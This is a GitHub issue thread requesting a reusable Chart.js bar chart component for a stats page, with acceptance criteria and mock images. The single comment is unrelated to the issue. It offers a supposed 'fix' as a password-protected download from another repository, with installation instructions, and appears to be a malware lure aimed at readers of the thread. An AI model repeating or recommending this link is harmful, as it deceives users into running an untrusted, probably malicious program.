### ISSUE TITLE
[Stats Page] - Bar Chart Component

### ISSUE THREAD

**Issue by martin0he** [Northeastern-Electric-Racing/FinishLine#2775]
### Description

We need a reusable bar chart component to display data. Using Chart.js, create a bar chart component that takes in x-axis data, y-axis data, axis labels, time frame, width, height, and graph title.

### Acceptance Criteria

- graph displays data in bar format
- hovering over a bar displays a tooltip with more detail
- all labels are properly formatted and sized/positioned
- width and height are responsive

### Proposed Solution

- new component file is created with suitable props

### Mocks

![image](https://github.com/user-attachments/assets/fc17e4aa-d31c-4781-936a-5d7297565a85)
![image](https://github.com/user-attachments/assets/fa49e164-22c5-44e9-a089-e61b043ffcbc)

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
